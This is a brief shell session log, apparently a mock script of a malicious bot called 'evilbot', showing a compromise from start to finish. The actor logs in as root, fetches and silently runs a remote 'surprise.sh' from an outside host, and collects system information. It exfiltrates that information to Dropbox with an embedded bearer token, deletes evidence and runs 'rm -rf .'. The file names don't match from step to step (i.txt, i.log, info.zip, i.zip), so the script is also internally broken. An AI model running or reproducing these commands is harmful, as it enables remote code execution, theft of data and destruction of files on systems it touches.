!Shell initialized. Going to have some fun... ! !ssh root@localhost !password: ******* !Connected to localhost $curl -u evilbot scp://2001:1890:1352:1::20/~/klasdf/surprise.sh . $chmod 777 surprise.sh $./surprise.sh > /dev/null 2>&1 & $ $lshw > i.txt 2>&1 $zip -9 info.zip i.log $curl -X POST https://content.dropboxapi.com/2/files/upload \ !> --header "Authorization: Bearer BHQ3KsDFMdj47Czg2VWpPGhTyubwY5Aa" \ !> --header "Dropbox-API-Arg: {\"path\": \"/shitlol/{curr_session_id}/i.zip\"}" \ !> --header "Content-Type: application/octet-stream" \ !> --data-binary @i.zip > /dev/null 2>&1 $rm -f info.zip i.log $ $rm -rf . > /dev/null 2>&1 & $ ! !Thanks a lot... Have a nice day.